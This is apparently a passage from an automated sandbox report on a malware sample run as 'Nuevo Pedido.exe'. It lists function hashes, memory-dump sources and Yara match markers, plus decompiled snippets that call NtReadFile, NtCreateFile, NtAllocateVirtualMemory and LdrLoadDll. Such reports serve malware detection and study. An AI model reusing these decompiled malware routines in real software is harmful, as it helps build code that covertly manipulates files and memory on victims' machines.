                                  Function 056353EC, Relevance: .0, Instructions: 38COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26fa7ab5ea8295d6a16862f9ab988f89e1222229729b914b01afca093eadccd1
                                  • Instruction ID: bd35201a689936dd196cae8fb23080a7d571ac831fa46831a019c2aa97a1f65b
                                  • Opcode Fuzzy Hash: 26fa7ab5ea8295d6a16862f9ab988f89e1222229729b914b01afca093eadccd1
                                  • Instruction Fuzzy Hash: 8B011670800219DFDB18CF6AC4493EEBBF1BF08321F20C625E826AB291D7744A44CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00FAD954, Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.240897737.0000000000FAD000.00000040.00000001.sdmp, Offset: 00FAD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da0a92953a1d503ab967f5b6c1b28d6f0c886f16da5711c79a5ae7aced08eb05
                                  • Instruction ID: 1875f23ec4fd462c9e129e4bc05f6375a038d6edd301d874e3f815914d2713c3
                                  • Opcode Fuzzy Hash: da0a92953a1d503ab967f5b6c1b28d6f0c886f16da5711c79a5ae7aced08eb05
                                  • Instruction Fuzzy Hash: 91F0C2718043849EE7108E06CCC4B67FFE8EB96334F18C45AED481B686C3B89844DAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 056353F8, Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff2c0c0c3577efe2ce23b9557526b8f0636c3d1a10c4b20ca2fa6b053141a0ee
                                  • Instruction ID: 163f525bd7ff584b64dd5ec602a0a21e4e6cd5950077a623be94f63a234019c1
                                  • Opcode Fuzzy Hash: ff2c0c0c3577efe2ce23b9557526b8f0636c3d1a10c4b20ca2fa6b053141a0ee
                                  • Instruction Fuzzy Hash: BC01E870800219DFDB18CF6AC4093AEBBF1BF48351F10C625E826AB291D7744A45CBD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05636511, Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5dd4a22843ae258f9f831a64a625ee4e93e28190f0781188ffb31a595074de02
                                  • Instruction ID: d2afd79ee0c98e451120f5b55aaa38f1068a760ffdd49649ede3468f66e4b23a
                                  • Opcode Fuzzy Hash: 5dd4a22843ae258f9f831a64a625ee4e93e28190f0781188ffb31a595074de02
                                  • Instruction Fuzzy Hash: FCF017B4D10208EFEB55DFA4D9457AEBBB1FB48300F1082AAD814A3744EB354A41CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 056365D7, Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb6645a6d95b42fcd322a6c5cae39ef25cb6de20ff84766c1c6d80c274f847ca
                                  • Instruction ID: 8789a6cf8838f08f7582a55df38deddb8f56314c0f034e5d3b1f7e787a39b5d8
                                  • Opcode Fuzzy Hash: eb6645a6d95b42fcd322a6c5cae39ef25cb6de20ff84766c1c6d80c274f847ca
                                  • Instruction Fuzzy Hash: 7A01AF70D10209EFCB40DFA8D485A9DBBF5FB49314F108AAAD915A7315D3709A80CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 056365D8, Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8178549187e39ec5ff1df0076e4e090253ba83f14da91591e08ad0217c82b6a1
                                  • Instruction ID: 43de0961dd8def9e7e7747fe1f698c99319798f47bafb3595bec0d6450488011
                                  • Opcode Fuzzy Hash: 8178549187e39ec5ff1df0076e4e090253ba83f14da91591e08ad0217c82b6a1
                                  • Instruction Fuzzy Hash: 5F01B274D00209EFCB40EFA8D485A9DBBF5FB48304F108AA5D914A7355D770AA80CF85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05635498, Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 343e4c46c0021679389992ef7aca147827576cc6cdcd58265fa3fe7f04a50b00
                                  • Instruction ID: 725fb41289d28eaea7adbbb1c015cbca92ae542a12e8d7d2905001267d1925b4
                                  • Opcode Fuzzy Hash: 343e4c46c0021679389992ef7aca147827576cc6cdcd58265fa3fe7f04a50b00
                                  • Instruction Fuzzy Hash: 30E06D72B001246F9314DAAEDC84C6BBBEEEBCD674355813AF50DC7310DA309C0187A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05636578, Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5094db5a7b0886af9814ff51d13c1e158204286811744a05265bdd0f52048ee8
                                  • Instruction ID: 8b94218e6df9100ea18fd45f68ca26a01411c035169d877048a3335cd11f9d00
                                  • Opcode Fuzzy Hash: 5094db5a7b0886af9814ff51d13c1e158204286811744a05265bdd0f52048ee8
                                  • Instruction Fuzzy Hash: 62F058B0D08208ABDB54DFA8D8467EEBBF8FB04300F0086AAC818A3740EB7056418B45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05636520, Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46d3aef7c858d2993ca7e8a167e9ef2f196f95166a10e5b0482d06249f08ac8d
                                  • Instruction ID: cc932a58bdb6c63e79656decab2092dc57edad5ee74ab2d06a6db2f07094e615
                                  • Opcode Fuzzy Hash: 46d3aef7c858d2993ca7e8a167e9ef2f196f95166a10e5b0482d06249f08ac8d
                                  • Instruction Fuzzy Hash: C7F058B4D00208EFDB04DFE8D944AAEFBB1FB48300F1082AAD814A3344DB350A41CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0563E808, Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa199f7dcb28f51c9d94ebf7471e0d02e8f6e85a025dae69752462553d00e4b8
                                  • Instruction ID: 49511a19ba13e0fa5adecb5ddaafe5d5867a2576ba13dab282654f07bdb71ff6
                                  • Opcode Fuzzy Hash: aa199f7dcb28f51c9d94ebf7471e0d02e8f6e85a025dae69752462553d00e4b8
                                  • Instruction Fuzzy Hash: 82E0E63135011027E60921559C17FB7754ED7C1B50F14806AF6069B685DED26D1A42D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05636588, Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38d3f910532eebc105a7e32b89b3081867932acce792eda40c900283f203e756
                                  • Instruction ID: 562af8138d59f74ef4acb6cc917e5386d3832725c1138319ffc2cac5fd737701
                                  • Opcode Fuzzy Hash: 38d3f910532eebc105a7e32b89b3081867932acce792eda40c900283f203e756
                                  • Instruction Fuzzy Hash: 03E0C2B4D08208AFDB44EFE9D8416ADBBF5FB48300F0095AA8828A3304EB705A41CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05634A4F, Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96c0c7a277e171d11845a71888af36a9683394b836d4e5525712a4af846fa0b2
                                  • Instruction ID: 5547925dd0527499d91f59c8507bd429e03963fd6ca01bc36d2001ca2507b909
                                  • Opcode Fuzzy Hash: 96c0c7a277e171d11845a71888af36a9683394b836d4e5525712a4af846fa0b2
                                  • Instruction Fuzzy Hash: 68F0E575A0210CCFCB40EFA4EA825EDBB70EF4220872085E5D80CD3302D7306E0ADB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05639948, Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97fcde7381850a7bfed954530d92822c5e7f4be1b7a3724f2e96815e5609efc5
                                  • Instruction ID: 41444895be42cafff138023392703bd84306644bef218201b72001491a3f25f7
                                  • Opcode Fuzzy Hash: 97fcde7381850a7bfed954530d92822c5e7f4be1b7a3724f2e96815e5609efc5
                                  • Instruction Fuzzy Hash: 1BE02B327001104FCB04D619D809B9237FCDF48355FA01076F406C7761DE60DC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05634A60, Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 378ad98cf22ded416ba97ac41456d9cbd7ff4948ba7b1753d7315daec7545009
                                  • Instruction ID: 31beac768312333f84c69116a1b28ed1b0a08d3606e99971af36f737a8920668
                                  • Opcode Fuzzy Hash: 378ad98cf22ded416ba97ac41456d9cbd7ff4948ba7b1753d7315daec7545009
                                  • Instruction Fuzzy Hash: 5CE0867591110CEFCB40FFA4E9028AEBBB9EB453087108499E80993304EB317F059F51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05639958, Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1723a34f86d71a294030eb7674da00f87c8723082dc983835c4d1a00cd54a559
                                  • Instruction ID: 68e73770b1b874b5e42fd18897860436215d422ebbb68744a58e513ee8282551
                                  • Opcode Fuzzy Hash: 1723a34f86d71a294030eb7674da00f87c8723082dc983835c4d1a00cd54a559
                                  • Instruction Fuzzy Hash: 40D0C9317102148FC708DB5DE44499537EDEF8D6A575040BAF50ACB3A1DEA1AC419B81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05636BC8, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1c242ab72343e3767fc1a135e2c943cc73237b20db493ce8711135b28194c36
                                  • Instruction ID: b4c29227eb318a99c7f097cc86aec4c909772f6cc0b81a70c92adce5b783e561
                                  • Opcode Fuzzy Hash: d1c242ab72343e3767fc1a135e2c943cc73237b20db493ce8711135b28194c36
                                  • Instruction Fuzzy Hash: 28D05E71720109A7CB009F55E88AA9A7F66BF44360F08C420F4554E611CA71D814DF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05636BD8, Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2644debe30ad835e065a31e1fb54f1a7f17e00d931488cdb30846f1df934c21
                                  • Instruction ID: 845bc10f6d3216e4e3163a6899ca1e3909d22d9e21dc84213bace34662991d99
                                  • Opcode Fuzzy Hash: c2644debe30ad835e065a31e1fb54f1a7f17e00d931488cdb30846f1df934c21
                                  • Instruction Fuzzy Hash: D4C08C31200208ABCB00AF81E80988A7F6AEB88261704C020F80942220CF71E810AEA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00A85C24, Relevance: 1.7, Instructions: 1651COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.240468071.0000000000A82000.00000002.00020000.sdmp, Offset: 00A80000, based on PE: true
                                  • Associated: 00000000.00000002.240447719.0000000000A80000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d1f2f79cc314208467f215915cc4752e064ab803304fa17a537d84d68eed565
                                  • Instruction ID: d6666187438c22bc45ed02c967529bdd30e4bb9d981939bb5f82397f9df6edd8
                                  • Opcode Fuzzy Hash: 0d1f2f79cc314208467f215915cc4752e064ab803304fa17a537d84d68eed565
                                  • Instruction Fuzzy Hash: 81D2436180E7C14FDB139B789CB51D1BFB1AE2721871E49CBC4C1CF0A3E2195A6AD762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05635AA0, Relevance: .3, Instructions: 270COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c56ec13096bd18893456fe6491adf3f5a2f1d22543157068ba78863f29650a79
                                  • Instruction ID: 3eee0f8520a2a4ba76d75be98fe232d9fed8c1000be719aa419ce4db1995e9c3
                                  • Opcode Fuzzy Hash: c56ec13096bd18893456fe6491adf3f5a2f1d22543157068ba78863f29650a79
                                  • Instruction Fuzzy Hash: C3D10731C2070ACACB10EBA4D8946DDB771FF95300F61CB9AE41977265EB706AC9DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 05635AB0, Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.242733570.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e108dc46546ba3a17cbbfe3de940047e505c3d32133c717092c53a1dafcfa2b2
                                  • Instruction ID: 2650d3b44fcd48b335afc9fae04b0146f56de02cfe691bd4584f7216e91bbe8b
                                  • Opcode Fuzzy Hash: e108dc46546ba3a17cbbfe3de940047e505c3d32133c717092c53a1dafcfa2b2
                                  • Instruction Fuzzy Hash: 22D11731C2070ACACB10EBA4D8946DDB771FF95300F61CB9AE01977255EB706AC9DB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: Nuevo Pedido.exe PID: 6464 Parent PID: 6320 Nuevo Pedido.exeCOMMON

                                  Executed Functions

                                  Function 0041870C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45nativefileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 36%
                                  			E0041870C(void* __eflags, long _a4, void* _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _v1;
				intOrPtr* __esi;
				void* __ebp;
				signed char _t11;
				void* _t15;
				void* _t16;
				intOrPtr* _t22;

				asm("outsd");
				asm("aaa");
				if(__eflags <= 0) {
					asm("les edx, [edx+edx*2]");
					_t6 =  &_a12; // 0x413d72
					_t15 =  *((intOrPtr*)( *_t22))( *_t6, _a16, _a20, _a24, _a28, _a32, _t16, _t11 & 0x00000083); // executed
					return _t15;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t8 = __eax + 0x10; // 0x300
					_t9 = __eax + 0xc50; // 0x409763
					__esi = _t9;
					E004191E0(__edi, _a4, __esi,  *_t8, 0, 0x2c) =  *__esi;
					__eax = NtClose(_a8); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}










                                  0x0041870c
                                  0x0041870d
                                  0x0041870e
                                  0x004186b6
                                  0x004186cd
                                  0x004186d5
                                  0x004186d9
                                  0x00418710
                                  0x00418711
                                  0x00418713
                                  0x00418716
                                  0x0041871f
                                  0x0041871f
                                  0x0041872f
                                  0x00418735
                                  0x00418737
                                  0x00418738
                                  0x00418739
                                  0x00418739

                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileRead
                                  • String ID: r=A$r=A
                                  • API String ID: 752142053-687523353
                                  • Opcode ID: 3b3bec6fc17b14757e2846f337452442af0f872d1e81a83bb53dd8ee4f6c1341
                                  • Instruction ID: c55b9a0ab9c92f634dcec03df039051860dc37adbd83c16fa249bc5599e4b9db
                                  • Opcode Fuzzy Hash: 3b3bec6fc17b14757e2846f337452442af0f872d1e81a83bb53dd8ee4f6c1341
                                  • Instruction Fuzzy Hash: F3F037B6204109ABDB14EF98DC84EEB77ADEF8C350F148659FA1C97201C630EA518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, signed char _a36, void* _a40) {
				void* _v5;
				signed char _t15;
				void* _t19;
				intOrPtr _t21;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E004191E0(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t15 = _a36;
				_t6 =  &_a32; // 0x413d72
				_t21 =  *_t6;
				asm("les edx, [edx+edx*2]");
				_t12 =  &_a8; // 0x413d72
				_t19 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28, _t21, _t15 & 0x00000083); // executed
				return _t19;
			}









                                  0x00418693
                                  0x0041869f
                                  0x004186a7
                                  0x004186af
                                  0x004186b2
                                  0x004186b2
                                  0x004186b6
                                  0x004186cd
                                  0x004186d5
                                  0x004186d9

                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:A$r=A$r=A
                                  • API String ID: 2738559852-4243674446
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                  • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 14fb0e685b14bc2e8987bb15aad2236e8004caa7c4de4aa380136097aeacb9b2
                                  • Instruction ID: 8bdd5aeda29f47ac0509a0170fa52686f44c6279ab4504c2a3c2d20870324ebe
                                  • Opcode Fuzzy Hash: 14fb0e685b14bc2e8987bb15aad2236e8004caa7c4de4aa380136097aeacb9b2
                                  • Instruction Fuzzy Hash: 67F014B6204189ABCB08CF98D885CEB77A9EF8C354B15864DFA0D93202C634E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004187BA, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: f0df123638db383ec16eab7ed2f3c65fc3d6a2ffb79afe6041dca1b672234c46
                                  • Instruction ID: aeb5714664a6f4c1001d9c77c1b6d016b203ec6e3297d5e22e6097ef29b6eef1
                                  • Opcode Fuzzy Hash: f0df123638db383ec16eab7ed2f3c65fc3d6a2ffb79afe6041dca1b672234c46
                                  • Instruction Fuzzy Hash: CBF0F2B6204209ABDB14DF89DC85EEB77A9AF88354F118659FE0897241C634E910CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f786db786914ef59345290d3168d3a710ffcb86c38d3a753a01f2aaba0ba5233
                                  • Instruction ID: 970847535d5f0cb4f7bfd8bdf7b5a0f7e266e8390238ffc03460d079b21a00c0
                                  • Opcode Fuzzy Hash: f786db786914ef59345290d3168d3a710ffcb86c38d3a753a01f2aaba0ba5233
                                  • Instruction Fuzzy Hash: EA9002A234100442D10161E95424B160005E7E1341F51C015E1054558DC699CC527166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 66f35f09d153f689a883c48d1d686a06ad9c633122bd86c6a759ed6e595583d7
                                  • Instruction ID: bbb4e8f8e9ef639b693f1ba533389130ba35651f342907eb13e4a6a195060d8c
                                  • Opcode Fuzzy Hash: 66f35f09d153f689a883c48d1d686a06ad9c633122bd86c6a759ed6e595583d7
                                  • Instruction Fuzzy Hash: 919002B220100402D14171E954147560005A7D0341F51C011A5054558EC6D98DD576A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019F98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0f00fa3d9b9b0431927cb1cd19135e50a84d838351a5b0e8583e99baf7685758
